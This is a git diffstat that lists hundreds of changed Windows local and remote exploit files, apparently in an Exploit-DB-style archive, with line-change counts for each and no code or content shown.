+- platforms/windows/local/2065.c | 458 +- platforms/windows/local/2091.cpp | 4520 +++--- platforms/windows/local/2094.c | 548 +- platforms/windows/local/2264.htm | 172 +- platforms/windows/local/2284.c | 324 +- platforms/windows/local/2286.cpp | 252 +- platforms/windows/local/2676.cpp | 816 +- platforms/windows/local/272.c | 6 +- platforms/windows/local/2950.c | 490 +- platforms/windows/local/3024.c | 548 +- platforms/windows/local/3071.c | 660 +- platforms/windows/local/3131.c | 336 +- platforms/windows/local/3149.cpp | 352 +- platforms/windows/local/3159.cpp | 346 +- platforms/windows/local/3176.cpp | 472 +- platforms/windows/local/32.c | 6 +- platforms/windows/local/3342.c | 300 +- platforms/windows/local/3349.c | 220 +- platforms/windows/local/3369.pl | 192 +- platforms/windows/local/3417.php | 88 +- platforms/windows/local/3429.php | 36 +- platforms/windows/local/3431.php | 88 +- platforms/windows/local/3439.php | 92 +- platforms/windows/local/3451.c | 448 +- platforms/windows/local/3488.php | 88 +- platforms/windows/local/350.c | 6 +- platforms/windows/local/351.c | 6 +- platforms/windows/local/353.c | 6 +- platforms/windows/local/355.c | 6 +- platforms/windows/local/3576.php | 92 +- platforms/windows/local/3593.c | 454 +- platforms/windows/local/3617.cpp | 290 +- platforms/windows/local/3647.c | 142 +- platforms/windows/local/3649.c | 128 +- platforms/windows/local/3652.c | 338 +- platforms/windows/local/368.c | 6 +- platforms/windows/local/3695.c | 174 +- platforms/windows/local/3727.c | 174 +- platforms/windows/local/3757.txt | 286 +- platforms/windows/local/3777.c | 224 +- platforms/windows/local/3779.c | 916 +- platforms/windows/local/3793.c | 2866 ++-- platforms/windows/local/3798.c | 2404 +-- platforms/windows/local/3812.c | 2608 ++-- platforms/windows/local/388.c | 6 +- platforms/windows/local/3897.c | 680 +- platforms/windows/local/395.c | 6 +- platforms/windows/local/4001.cpp | 186 +- platforms/windows/local/4002.py | 90 +- 
platforms/windows/local/4024.rb | 170 +- platforms/windows/local/403.c | 6 +- platforms/windows/local/4080.php | 72 +- platforms/windows/local/4165.c | 780 +- platforms/windows/local/4204.php | 104 +- platforms/windows/local/4218.php | 46 +- platforms/windows/local/4236.php | 64 +- platforms/windows/local/4252.c | 1240 +- platforms/windows/local/4257.c | 144 +- platforms/windows/local/4262.cpp | 730 +- platforms/windows/local/4263.cpp | 802 +- platforms/windows/local/4270.php | 98 +- platforms/windows/local/4274.php | 96 +- platforms/windows/local/4302.php | 100 +- platforms/windows/local/4303.php | 78 +- platforms/windows/local/4311.php | 84 +- platforms/windows/local/4314.php | 50 +- platforms/windows/local/4325.php | 2 +- platforms/windows/local/4345.c | 1106 +- platforms/windows/local/4354.py | 64 +- platforms/windows/local/4355.php | 6 +- platforms/windows/local/4361.pl | 738 +- platforms/windows/local/4431.py | 204 +- platforms/windows/local/4517.php | 88 +- platforms/windows/local/4553.php | 136 +- platforms/windows/local/4583.py | 110 +- platforms/windows/local/4701.pl | 236 +- platforms/windows/local/4702.pl | 534 +- platforms/windows/local/4749.c | 232 +- platforms/windows/local/4892.py | 178 +- platforms/windows/local/4938.py | 254 +- platforms/windows/local/4998.c | 13082 ++++++++-------- platforms/windows/local/5004.c | 554 +- platforms/windows/local/5077.cpp | 268 +- platforms/windows/local/5141.c | 188 +- platforms/windows/local/5144.c | 686 +- platforms/windows/local/5250.cpp | 188 +- platforms/windows/local/5346.pl | 92 +- platforms/windows/local/5361.py | 222 +- platforms/windows/local/5479.txt | 350 +- platforms/windows/local/5492.cpp | 156 +- platforms/windows/local/5498.py | 206 +- platforms/windows/local/558.c | 6 +- platforms/windows/local/5584.c | 14736 +++++++++--------- platforms/windows/local/5625.c | 304 +- platforms/windows/local/5667.py | 322 +- platforms/windows/local/5837.c | 512 +- platforms/windows/local/6039.c | 300 +- 
platforms/windows/local/6322.pl | 522 +- platforms/windows/local/6329.pl | 130 +- platforms/windows/local/6333.pl | 526 +- platforms/windows/local/6389.cpp | 226 +- platforms/windows/local/6787.pl | 352 +- platforms/windows/local/6798.pl | 144 +- platforms/windows/local/6825.pl | 180 +- platforms/windows/local/6831.cpp | 838 +- platforms/windows/local/7051.pl | 150 +- platforms/windows/local/7135.htm | 82 +- platforms/windows/local/7264.txt | 80 +- platforms/windows/local/7329.py | 116 +- platforms/windows/local/7334.pl | 132 +- platforms/windows/local/7347.pl | 270 +- platforms/windows/local/7501.asp | 492 +- platforms/windows/local/7577.pl | 290 +- platforms/windows/local/7684.pl | 82 +- platforms/windows/local/7688.pl | 100 +- platforms/windows/local/7727.pl | 362 +- platforms/windows/local/7765.py | 90 +- platforms/windows/local/7839.py | 106 +- platforms/windows/local/7843.c | 84 +- platforms/windows/local/7848.pl | 94 +- platforms/windows/local/7853.pl | 188 +- platforms/windows/local/79.c | 6 +- platforms/windows/local/7923.c | 274 +- platforms/windows/local/7957.pl | 188 +- platforms/windows/local/7973.pl | 76 +- platforms/windows/local/7974.c | 84 +- platforms/windows/local/7975.py | 164 +- platforms/windows/local/798.c | 6 +- platforms/windows/local/8126.py | 110 +- platforms/windows/local/8137.py | 116 +- platforms/windows/local/8159.rb | 164 +- platforms/windows/local/8162.py | 120 +- platforms/windows/local/8171.py | 120 +- platforms/windows/local/8174.py | 106 +- platforms/windows/local/8177.py | 90 +- platforms/windows/local/8178.pl | 410 +- platforms/windows/local/8179.rb | 196 +- platforms/windows/local/8193.py | 118 +- platforms/windows/local/8214.c | 372 +- platforms/windows/local/8231.php | 872 +- platforms/windows/local/8236.py | 128 +- platforms/windows/local/8249.php | 160 +- platforms/windows/local/8251.py | 118 +- platforms/windows/local/8270.pl | 114 +- platforms/windows/local/8274.pl | 134 +- platforms/windows/local/8275.pl | 204 +- 
platforms/windows/local/8299.py | 200 +- platforms/windows/local/8301.pl | 116 +- platforms/windows/local/8311.py | 200 +- platforms/windows/local/833.cpp | 6 +- platforms/windows/local/834.c | 6 +- platforms/windows/local/8343.pl | 5216 +++---- platforms/windows/local/835.c | 6 +- platforms/windows/local/836.c | 6 +- platforms/windows/local/837.c | 6 +- platforms/windows/local/8371.pl | 56 +- platforms/windows/local/839.cpp | 6 +- platforms/windows/local/8401.cpp | 218 +- platforms/windows/local/8410.pl | 74 +- platforms/windows/local/8412.pl | 74 +- platforms/windows/local/8413.pl | 74 +- platforms/windows/local/8416.pl | 74 +- platforms/windows/local/8420.py | 104 +- platforms/windows/local/8426.pl | 220 +- platforms/windows/local/8427.py | 100 +- platforms/windows/local/844.asm | 6 +- platforms/windows/local/8444.cpp | 222 +- platforms/windows/local/846.cpp | 6 +- platforms/windows/local/848.asm | 6 +- platforms/windows/local/8580.py | 152 +- platforms/windows/local/8582.py | 98 +- platforms/windows/local/8583.py | 106 +- platforms/windows/local/8589.py | 74 +- platforms/windows/local/8594.pl | 50 +- platforms/windows/local/8612.pl | 72 +- platforms/windows/local/8620.pl | 82 +- platforms/windows/local/8624.pl | 80 +- platforms/windows/local/8628.pl | 100 +- platforms/windows/local/8629.pl | 100 +- platforms/windows/local/863.cpp | 6 +- platforms/windows/local/8630.pl | 126 +- platforms/windows/local/8631.pl | 100 +- platforms/windows/local/8632.pl | 126 +- platforms/windows/local/8633.pl | 100 +- platforms/windows/local/8634.pl | 126 +- platforms/windows/local/8637.pl | 180 +- platforms/windows/local/8640.pl | 84 +- platforms/windows/local/8656.py | 156 +- platforms/windows/local/8657.txt | 81 +- platforms/windows/local/8660.pl | 84 +- platforms/windows/local/8661.pl | 82 +- platforms/windows/local/8662.py | 100 +- platforms/windows/local/8663.pl | 58 +- platforms/windows/local/8670.php | 116 +- platforms/windows/local/8698.pl | 60 +- 
platforms/windows/local/8701.py | 82 +- platforms/windows/local/8780.php | 240 +- platforms/windows/local/8789.py | 188 +- platforms/windows/local/884.cpp | 6 +- platforms/windows/local/885.cpp | 6 +- platforms/windows/local/8863.c | 282 +- platforms/windows/local/8983.c | 620 +- platforms/windows/local/9034.pl | 84 +- platforms/windows/local/9038.py | 100 +- platforms/windows/local/9047.pl | 86 +- platforms/windows/local/905.c | 6 +- platforms/windows/local/9064.pl | 84 +- platforms/windows/local/9070.pl | 70 +- platforms/windows/local/912.c | 6 +- platforms/windows/local/9146.pl | 133 +- platforms/windows/local/9149.pl | 90 +- platforms/windows/local/9152.pl | 82 +- platforms/windows/local/9172.pl | 78 +- platforms/windows/local/918.c | 6 +- platforms/windows/local/919.c | 6 +- platforms/windows/local/9190.pl | 104 +- platforms/windows/local/9199.txt | 72 +- platforms/windows/local/920.c | 6 +- platforms/windows/local/9215.pl | 98 +- platforms/windows/local/9216.pl | 144 +- platforms/windows/local/9223.txt | 144 +- platforms/windows/local/9272.py | 98 +- platforms/windows/local/9286.pl | 168 +- platforms/windows/local/9298.pl | 178 +- platforms/windows/local/9305.txt | 98 +- platforms/windows/local/932.sql | 6 +- platforms/windows/local/933.sql | 6 +- platforms/windows/local/9343.pl | 100 +- platforms/windows/local/9346.pl | 88 +- platforms/windows/local/935.c | 6 +- platforms/windows/local/9354.pl | 56 +- platforms/windows/local/936.c | 6 +- platforms/windows/local/9364.py | 38 +- platforms/windows/local/937.c | 6 +- platforms/windows/local/9377.pl | 90 +- platforms/windows/local/9379.pl | 62 +- platforms/windows/local/938.cpp | 6 +- platforms/windows/local/9386.txt | 138 +- platforms/windows/local/9409.pl | 84 +- platforms/windows/local/9426.java | 80 +- platforms/windows/local/9428.pl | 88 +- platforms/windows/local/9458.pl | 88 +- platforms/windows/local/9466.pl | 178 +- platforms/windows/local/9483.pl | 508 +- platforms/windows/local/9495.pl | 82 +- 
platforms/windows/local/9519.pl | 452 +- platforms/windows/local/9536.py | 176 +- platforms/windows/local/9540.py | 144 +- platforms/windows/local/9548.pl | 78 +- platforms/windows/local/9550.txt | 238 +- platforms/windows/local/9551.py | 204 +- platforms/windows/local/9567.pl | 76 +- platforms/windows/local/9580.pl | 82 +- platforms/windows/local/9610.py | 182 +- platforms/windows/local/9619.pl | 92 +- platforms/windows/local/9624.py | 102 +- platforms/windows/local/9628.pl | 84 +- platforms/windows/local/963.c | 6 +- platforms/windows/local/964.c | 6 +- platforms/windows/local/965.c | 6 +- platforms/windows/local/9655.pl | 80 +- platforms/windows/local/9659.cpp | 700 +- platforms/windows/local/966.c | 6 +- platforms/windows/local/9680.txt | 138 +- platforms/windows/local/9983.pl | 1 - platforms/windows/remote/1026.cpp | 6 +- platforms/windows/remote/1028.c | 6 +- platforms/windows/remote/103.c | 6 +- platforms/windows/remote/1035.c | 6 +- platforms/windows/remote/1066.cpp | 6 +- platforms/windows/remote/1075.c | 6 +- platforms/windows/remote/1079.html | 6 +- platforms/windows/remote/109.c | 6 +- platforms/windows/remote/1096.txt | 6 +- platforms/windows/remote/1099.pl | 6 +- platforms/windows/remote/1108.pl | 6 +- platforms/windows/remote/1115.pl | 6 +- platforms/windows/remote/1118.c | 6 +- platforms/windows/remote/1130.c | 6 +- platforms/windows/remote/1131.c | 6 +- platforms/windows/remote/1132.c | 6 +- platforms/windows/remote/1147.pm | 6 +- platforms/windows/remote/1150.pm | 6 +- platforms/windows/remote/1152.pm | 6 +- platforms/windows/remote/116.c | 6 +- platforms/windows/remote/117.c | 6 +- platforms/windows/remote/1178.c | 6 +- platforms/windows/remote/1179.c | 6 +- platforms/windows/remote/1180.c | 6 +- platforms/windows/remote/119.c | 6 +- platforms/windows/remote/1190.c | 6 +- platforms/windows/remote/1193.pl | 6 +- platforms/windows/remote/1201.pl | 6 +- platforms/windows/remote/121.c | 6 +- platforms/windows/remote/1210.pm | 6 +- 
platforms/windows/remote/1223.c | 618 +- platforms/windows/remote/123.c | 6 +- platforms/windows/remote/1243.c | 216 +- platforms/windows/remote/1260.pm | 324 +- platforms/windows/remote/1262.pm | 240 +- platforms/windows/remote/1264.pl | 678 +- platforms/windows/remote/1277.c | 246 +- platforms/windows/remote/1279.pm | 264 +- platforms/windows/remote/130.c | 6 +- platforms/windows/remote/1313.c | 522 +- platforms/windows/remote/1332.pm | 316 +- platforms/windows/remote/135.c | 6 +- platforms/windows/remote/1357.diff | 342 +- platforms/windows/remote/136.pl | 6 +- platforms/windows/remote/1365.pm | 327 +- platforms/windows/remote/1366.pm | 355 +- platforms/windows/remote/1374.pl | 116 +- platforms/windows/remote/1391.pm | 697 +- platforms/windows/remote/1408.pl | 180 +- platforms/windows/remote/1413.c | 754 +- platforms/windows/remote/1414.pl | 186 +- platforms/windows/remote/1417.pl | 112 +- platforms/windows/remote/1420.c | 2798 ++-- platforms/windows/remote/1421.cpp | 498 +- platforms/windows/remote/1463.pm | 215 +- platforms/windows/remote/1466.pl | 122 +- platforms/windows/remote/1504.pm | 532 +- platforms/windows/remote/1505.html | 210 +- platforms/windows/remote/1506.c | 978 +- platforms/windows/remote/1536.pm | 447 +- platforms/windows/remote/155.c | 6 +- platforms/windows/remote/1565.pl | 152 +- platforms/windows/remote/159.c | 6 +- platforms/windows/remote/1592.c | 612 +- platforms/windows/remote/1606.html | 172 +- platforms/windows/remote/1607.cpp | 206 +- platforms/windows/remote/1620.pm | 634 +- platforms/windows/remote/1628.cpp | 228 +- platforms/windows/remote/163.pl | 6 +- platforms/windows/remote/164.c | 6 +- platforms/windows/remote/165.c | 6 +- platforms/windows/remote/166.pl | 6 +- platforms/windows/remote/1664.py | 114 +- platforms/windows/remote/168.c | 6 +- platforms/windows/remote/1681.pm | 254 +- platforms/windows/remote/1703.pl | 486 +- platforms/windows/remote/1776.c | 376 +- platforms/windows/remote/20.txt | 6 +- 
platforms/windows/remote/2070.pl | 166 +- platforms/windows/remote/2074.pm | 172 +- platforms/windows/remote/2075.pm | 172 +- platforms/windows/remote/2076.pl | 152 +- platforms/windows/remote/2079.pl | 214 +- platforms/windows/remote/2080.pl | 186 +- platforms/windows/remote/2140.pm | 212 +- platforms/windows/remote/2276.pm | 606 +- platforms/windows/remote/2277.c | 378 +- platforms/windows/remote/2283.c | 844 +- platforms/windows/remote/23.c | 6 +- platforms/windows/remote/232.c | 6 +- platforms/windows/remote/2320.txt | 24 +- platforms/windows/remote/2328.php | 294 +- platforms/windows/remote/2345.pl | 192 +- platforms/windows/remote/2358.c | 348 +- platforms/windows/remote/2401.c | 370 +- platforms/windows/remote/2403.c | 414 +- platforms/windows/remote/2408.pl | 310 +- platforms/windows/remote/2425.html | 4 +- platforms/windows/remote/2426.pl | 330 +- platforms/windows/remote/2440.rb | 270 +- platforms/windows/remote/2448.html | 134 +- platforms/windows/remote/2458.pl | 216 +- platforms/windows/remote/2460.c | 338 +- platforms/windows/remote/2601.c | 804 +- platforms/windows/remote/2637.c | 438 +- platforms/windows/remote/2651.c | 292 +- platforms/windows/remote/266.c | 6 +- platforms/windows/remote/2671.pl | 200 +- platforms/windows/remote/268.c | 6 +- platforms/windows/remote/2680.pm | 248 +- platforms/windows/remote/2689.c | 450 +- platforms/windows/remote/2729.pm | 282 +- platforms/windows/remote/2743.html | 136 +- platforms/windows/remote/2749.html | 142 +- platforms/windows/remote/2753.c | 366 +- platforms/windows/remote/2770.rb | 400 +- platforms/windows/remote/2771.rb | 378 +- platforms/windows/remote/2785.c | 630 +- platforms/windows/remote/2809.py | 208 +- platforms/windows/remote/2866.html | 34 +- platforms/windows/remote/293.c | 6 +- platforms/windows/remote/295.c | 6 +- platforms/windows/remote/297.c | 6 +- platforms/windows/remote/2974.pl | 42 +- platforms/windows/remote/3037.php | 168 +- platforms/windows/remote/3055.html | 110 +- 
platforms/windows/remote/3058.html | 98 +- platforms/windows/remote/3063.pl | 40 +- platforms/windows/remote/3084.txt | 24 +- platforms/windows/remote/3086.py | 178 +- platforms/windows/remote/310.txt | 6 +- platforms/windows/remote/313.txt | 6 +- platforms/windows/remote/315.txt | 6 +- platforms/windows/remote/316.txt | 6 +- platforms/windows/remote/3168.java | 560 +- platforms/windows/remote/3211.py | 138 +- platforms/windows/remote/3218.pl | 288 +- platforms/windows/remote/3244.py | 186 +- platforms/windows/remote/3264.pl | 218 +- platforms/windows/remote/3279.html | 114 +- platforms/windows/remote/3291.pl | 210 +- platforms/windows/remote/3302.sh | 278 +- platforms/windows/remote/3319.pl | 264 +- platforms/windows/remote/3320.pl | 256 +- platforms/windows/remote/3364.pl | 232 +- platforms/windows/remote/3380.txt | 110 +- platforms/windows/remote/3391.py | 172 +- platforms/windows/remote/3395.c | 368 +- platforms/windows/remote/3462.cpp | 360 +- platforms/windows/remote/3463.cpp | 460 +- platforms/windows/remote/3495.txt | 240 +- platforms/windows/remote/3561.pl | 234 +- platforms/windows/remote/3575.cpp | 1058 +- platforms/windows/remote/36.c | 6 +- platforms/windows/remote/3604.py | 456 +- platforms/windows/remote/361.txt | 6 +- platforms/windows/remote/3661.pl | 224 +- platforms/windows/remote/3662.rb | 249 +- platforms/windows/remote/3737.py | 222 +- platforms/windows/remote/3738.php | 448 +- platforms/windows/remote/3740.c | 386 +- platforms/windows/remote/378.pl | 6 +- platforms/windows/remote/3810.html | 166 +- platforms/windows/remote/3877.html | 158 +- platforms/windows/remote/3880.html | 150 +- platforms/windows/remote/3881.html | 144 +- platforms/windows/remote/3893.c | 386 +- platforms/windows/remote/3925.py | 118 +- platforms/windows/remote/3927.html | 90 +- platforms/windows/remote/3934.py | 112 +- platforms/windows/remote/3938.html | 92 +- platforms/windows/remote/3950.html | 122 +- platforms/windows/remote/3951.html | 128 +- 
platforms/windows/remote/3952.html | 128 +- platforms/windows/remote/3961.html | 90 +- platforms/windows/remote/3966.php | 120 +- platforms/windows/remote/3967.html | 44 +- platforms/windows/remote/3968.html | 216 +- platforms/windows/remote/3982.html | 72 +- platforms/windows/remote/4008.html | 64 +- platforms/windows/remote/4010.html | 98 +- platforms/windows/remote/4014.py | 232 +- platforms/windows/remote/4015.html | 400 +- platforms/windows/remote/4016.sh | 38 +- platforms/windows/remote/4021.html | 118 +- platforms/windows/remote/4042.html | 88 +- platforms/windows/remote/4043.html | 80 +- platforms/windows/remote/4045.py | 584 +- platforms/windows/remote/4049.html | 106 +- platforms/windows/remote/4050.html | 76 +- platforms/windows/remote/4052.c | 288 +- platforms/windows/remote/4053.c | 290 +- platforms/windows/remote/4060.html | 88 +- platforms/windows/remote/4061.html | 60 +- platforms/windows/remote/4109.html | 88 +- platforms/windows/remote/4119.html | 158 +- platforms/windows/remote/4123.html | 120 +- platforms/windows/remote/4146.cpp | 1586 +- platforms/windows/remote/4152.py | 290 +- platforms/windows/remote/4157.cpp | 932 +- platforms/windows/remote/4158.html | 258 +- platforms/windows/remote/4160.html | 76 +- platforms/windows/remote/4170.html | 238 +- platforms/windows/remote/4176.html | 154 +- platforms/windows/remote/4177.html | 286 +- platforms/windows/remote/4190.html | 114 +- platforms/windows/remote/42.c | 6 +- platforms/windows/remote/4200.html | 156 +- platforms/windows/remote/4207.py | 350 +- platforms/windows/remote/4208.html | 78 +- platforms/windows/remote/421.c | 6 +- platforms/windows/remote/4217.html | 74 +- platforms/windows/remote/4222.c | 380 +- platforms/windows/remote/4223.pl | 302 +- platforms/windows/remote/4228.pl | 294 +- platforms/windows/remote/4230.html | 34 +- platforms/windows/remote/4237.html | 34 +- platforms/windows/remote/4240.html | 168 +- platforms/windows/remote/4244.html | 156 +- 
platforms/windows/remote/4245.html | 148 +- platforms/windows/remote/4247.c | 686 +- platforms/windows/remote/4255.html | 96 +- platforms/windows/remote/4259.txt | 106 +- platforms/windows/remote/426.c | 6 +- platforms/windows/remote/4279.html | 106 +- platforms/windows/remote/4287.py | 226 +- platforms/windows/remote/4290.html | 76 +- platforms/windows/remote/4292.cpp | 1022 +- platforms/windows/remote/431.c | 6 +- platforms/windows/remote/4328.html | 204 +- platforms/windows/remote/4348.c | 152 +- platforms/windows/remote/435.c | 6 +- platforms/windows/remote/4351.html | 98 +- platforms/windows/remote/4357.html | 68 +- platforms/windows/remote/4366.html | 104 +- platforms/windows/remote/4372.html | 74 +- platforms/windows/remote/4388.html | 74 +- platforms/windows/remote/4389.html | 162 +- platforms/windows/remote/439.c | 6 +- platforms/windows/remote/4393.html | 90 +- platforms/windows/remote/4394.html | 74 +- platforms/windows/remote/4398.html | 106 +- platforms/windows/remote/4420.html | 112 +- platforms/windows/remote/4427.html | 58 +- platforms/windows/remote/4428.html | 88 +- platforms/windows/remote/4429.pl | 264 +- platforms/windows/remote/4445.html | 92 +- platforms/windows/remote/4450.py | 128 +- platforms/windows/remote/4452.html | 158 +- platforms/windows/remote/4455.pl | 252 +- platforms/windows/remote/4468.html | 106 +- platforms/windows/remote/4487.html | 68 +- platforms/windows/remote/4488.html | 74 +- platforms/windows/remote/45.c | 6 +- platforms/windows/remote/4506.html | 86 +- platforms/windows/remote/4526.html | 40 +- platforms/windows/remote/4566.rb | 168 +- platforms/windows/remote/4574.pl | 374 +- platforms/windows/remote/4579.html | 138 +- platforms/windows/remote/4594.html | 88 +- platforms/windows/remote/4598.html | 62 +- platforms/windows/remote/4651.cpp | 530 +- platforms/windows/remote/4663.html | 192 +- platforms/windows/remote/4700.txt | 210 +- platforms/windows/remote/4713.txt | 312 +- platforms/windows/remote/472.c | 6 +- 
platforms/windows/remote/4720.html | 512 +- platforms/windows/remote/473.c | 6 +- platforms/windows/remote/4746.html | 178 +- platforms/windows/remote/4747.vbs | 76 +- platforms/windows/remote/475.sh | 6 +- platforms/windows/remote/478.c | 6 +- platforms/windows/remote/480.c | 6 +- platforms/windows/remote/4806.html | 228 +- platforms/windows/remote/4818.html | 232 +- platforms/windows/remote/4819.html | 228 +- platforms/windows/remote/4820.html | 230 +- platforms/windows/remote/4825.html | 230 +- platforms/windows/remote/4869.html | 60 +- platforms/windows/remote/4873.html | 62 +- platforms/windows/remote/4874.html | 84 +- platforms/windows/remote/4894.html | 138 +- platforms/windows/remote/4909.html | 70 +- platforms/windows/remote/4913.html | 52 +- platforms/windows/remote/4918.html | 158 +- platforms/windows/remote/4923.txt | 128 +- platforms/windows/remote/4932.html | 156 +- platforms/windows/remote/4934.c | 826 +- platforms/windows/remote/4946.html | 132 +- platforms/windows/remote/4959.html | 146 +- platforms/windows/remote/4967.html | 236 +- platforms/windows/remote/4974.html | 38 +- platforms/windows/remote/4979.html | 240 +- platforms/windows/remote/4981.html | 404 +- platforms/windows/remote/4982.html | 240 +- platforms/windows/remote/4986.html | 70 +- platforms/windows/remote/4987.html | 236 +- platforms/windows/remote/4999.htm | 66 +- platforms/windows/remote/5005.html | 66 +- platforms/windows/remote/5025.html | 238 +- platforms/windows/remote/5028.html | 48 +- platforms/windows/remote/5045.html | 74 +- platforms/windows/remote/5046.php | 174 +- platforms/windows/remote/5048.html | 120 +- platforms/windows/remote/5049.html | 264 +- platforms/windows/remote/5051.html | 242 +- platforms/windows/remote/5052.html | 238 +- platforms/windows/remote/5078.htm | 38 +- platforms/windows/remote/5079.c | 714 +- platforms/windows/remote/5087.html | 178 +- platforms/windows/remote/51.c | 6 +- platforms/windows/remote/5100.html | 240 +- 
platforms/windows/remote/5102.html | 94 +- platforms/windows/remote/5153.asp | 74 +- platforms/windows/remote/5188.html | 58 +- platforms/windows/remote/5190.html | 238 +- platforms/windows/remote/5193.html | 146 +- platforms/windows/remote/5205.html | 244 +- platforms/windows/remote/5212.py | 64 +- platforms/windows/remote/5228.txt | 196 +- platforms/windows/remote/5230.txt | 154 +- platforms/windows/remote/5238.py | 548 +- platforms/windows/remote/5264.html | 134 +- platforms/windows/remote/5269.txt | 260 +- platforms/windows/remote/5332.html | 260 +- platforms/windows/remote/5338.html | 46 +- platforms/windows/remote/5395.html | 86 +- platforms/windows/remote/5397.txt | 122 +- platforms/windows/remote/5398.html | 262 +- platforms/windows/remote/5489.html | 52 +- platforms/windows/remote/5496.html | 108 +- platforms/windows/remote/5511.html | 70 +- platforms/windows/remote/5530.html | 244 +- platforms/windows/remote/5536.php | 198 +- platforms/windows/remote/556.c | 6 +- platforms/windows/remote/56.c | 6 +- platforms/windows/remote/5619.html | 116 +- platforms/windows/remote/566.pl | 6 +- platforms/windows/remote/5681.html | 352 +- platforms/windows/remote/5694.cpp | 1168 +- platforms/windows/remote/5695.cpp | 1548 +- platforms/windows/remote/572.pl | 6 +- platforms/windows/remote/5732.html | 134 +- platforms/windows/remote/5738.rb | 174 +- platforms/windows/remote/5741.html | 606 +- platforms/windows/remote/5746.html | 170 +- platforms/windows/remote/5747.html | 128 +- platforms/windows/remote/5750.html | 96 +- platforms/windows/remote/577.c | 6 +- platforms/windows/remote/5777.html | 170 +- platforms/windows/remote/5778.html | 136 +- platforms/windows/remote/5793.html | 142 +- platforms/windows/remote/5795.html | 70 +- platforms/windows/remote/582.c | 6 +- platforms/windows/remote/5827.cpp | 1224 +- platforms/windows/remote/583.pl | 6 +- platforms/windows/remote/584.c | 6 +- platforms/windows/remote/589.html | 8 +- platforms/windows/remote/590.c | 6 +- 
platforms/windows/remote/6012.php | 266 +- platforms/windows/remote/6124.c | 90 +- platforms/windows/remote/6151.txt | 126 +- platforms/windows/remote/6152.html | 238 +- platforms/windows/remote/6175.html | 134 +- platforms/windows/remote/619.c | 6 +- platforms/windows/remote/621.c | 6 +- platforms/windows/remote/6220.html | 74 +- platforms/windows/remote/623.c | 6 +- platforms/windows/remote/627.pl | 6 +- platforms/windows/remote/6278.txt | 736 +- platforms/windows/remote/6302.pl | 344 +- platforms/windows/remote/6317.html | 158 +- platforms/windows/remote/6318.html | 132 +- platforms/windows/remote/6323.html | 142 +- platforms/windows/remote/6324.html | 42 +- platforms/windows/remote/6334.html | 52 +- platforms/windows/remote/6355.txt | 36 +- platforms/windows/remote/637.c | 6 +- platforms/windows/remote/6387.rb | 354 +- platforms/windows/remote/64.c | 6 +- platforms/windows/remote/640.c | 6 +- platforms/windows/remote/6407.c | 678 +- platforms/windows/remote/641.txt | 6 +- platforms/windows/remote/6414.html | 36 +- platforms/windows/remote/6491.html | 134 +- platforms/windows/remote/650.c | 6 +- platforms/windows/remote/6537.html | 2170 +-- platforms/windows/remote/6548.html | 120 +- platforms/windows/remote/658.c | 6 +- platforms/windows/remote/66.c | 6 +- platforms/windows/remote/6630.html | 186 +- platforms/windows/remote/6638.html | 124 +- platforms/windows/remote/6661.txt | 32 +- platforms/windows/remote/668.c | 6 +- platforms/windows/remote/6686.txt | 70 +- platforms/windows/remote/6690.html | 62 +- platforms/windows/remote/6699.html | 106 +- platforms/windows/remote/6773.html | 74 +- platforms/windows/remote/6774.html | 80 +- platforms/windows/remote/6776.html | 80 +- platforms/windows/remote/6793.html | 142 +- platforms/windows/remote/6801.txt | 316 +- platforms/windows/remote/6804.pl | 122 +- platforms/windows/remote/6813.html | 90 +- platforms/windows/remote/6828.html | 158 +- platforms/windows/remote/6840.html | 204 +- 
platforms/windows/remote/6870.html | 94 +- platforms/windows/remote/6871.html | 138 +- platforms/windows/remote/6872.html | 90 +- platforms/windows/remote/6875.html | 80 +- platforms/windows/remote/6878.html | 154 +- platforms/windows/remote/6880.html | 222 +- platforms/windows/remote/69.c | 6 +- platforms/windows/remote/6963.html | 2172 +-- platforms/windows/remote/70.c | 6 +- platforms/windows/remote/7056.rb | 214 +- platforms/windows/remote/7142.html | 58 +- platforms/windows/remote/7145.txt | 86 +- platforms/windows/remote/7167.html | 74 +- platforms/windows/remote/7181.html | 74 +- platforms/windows/remote/730.html | 6 +- platforms/windows/remote/7355.txt | 326 +- platforms/windows/remote/7402.html | 142 +- platforms/windows/remote/7442.txt | 104 +- platforms/windows/remote/7452.pl | 196 +- platforms/windows/remote/7477.html | 96 +- platforms/windows/remote/7521.txt | 22 +- platforms/windows/remote/7566.html | 28 +- platforms/windows/remote/7583.pl | 122 +- platforms/windows/remote/7584.pl | 212 +- platforms/windows/remote/7594.html | 58 +- platforms/windows/remote/76.c | 6 +- platforms/windows/remote/7623.html | 70 +- platforms/windows/remote/7630.html | 82 +- platforms/windows/remote/7706.mrc | 144 +- platforms/windows/remote/7739.html | 124 +- platforms/windows/remote/7747.html | 66 +- platforms/windows/remote/7748.html | 66 +- platforms/windows/remote/7749.html | 78 +- platforms/windows/remote/7755.html | 58 +- platforms/windows/remote/7757.html | 78 +- platforms/windows/remote/7762.html | 60 +- platforms/windows/remote/7763.html | 78 +- platforms/windows/remote/7779.html | 60 +- platforms/windows/remote/7794.html | 62 +- platforms/windows/remote/7842.html | 96 +- platforms/windows/remote/7868.html | 74 +- platforms/windows/remote/7871.html | 162 +- platforms/windows/remote/7875.pl | 410 +- platforms/windows/remote/7903.html | 94 +- platforms/windows/remote/7910.html | 44 +- platforms/windows/remote/7913.pl | 286 +- platforms/windows/remote/7926.pl | 216 
+- platforms/windows/remote/7935.html | 32 +- platforms/windows/remote/794.c | 6 +- platforms/windows/remote/7966.txt | 100 +- platforms/windows/remote/7988.pl | 152 +- platforms/windows/remote/7989.pl | 238 +- platforms/windows/remote/802.cpp | 6 +- platforms/windows/remote/804.c | 6 +- platforms/windows/remote/8041.txt | 34 +- platforms/windows/remote/81.c | 6 +- platforms/windows/remote/8117.pl | 200 +- platforms/windows/remote/8118.html | 94 +- platforms/windows/remote/8143.html | 84 +- platforms/windows/remote/8144.txt | 76 +- platforms/windows/remote/8155.txt | 36 +- platforms/windows/remote/8160.html | 86 +- platforms/windows/remote/8200.pl | 94 +- platforms/windows/remote/8203.pl | 230 +- platforms/windows/remote/8206.html | 148 +- platforms/windows/remote/8208.html | 76 +- platforms/windows/remote/8211.pl | 92 +- platforms/windows/remote/8215.txt | 68 +- platforms/windows/remote/8227.pl | 314 +- platforms/windows/remote/8248.py | 150 +- platforms/windows/remote/825.c | 6 +- platforms/windows/remote/8253.c | 784 +- platforms/windows/remote/8256.c | 260 +- platforms/windows/remote/8257.txt | 184 +- platforms/windows/remote/827.c | 6 +- platforms/windows/remote/8284.pl | 124 +- platforms/windows/remote/8295.pl | 142 +- platforms/windows/remote/8321.py | 120 +- 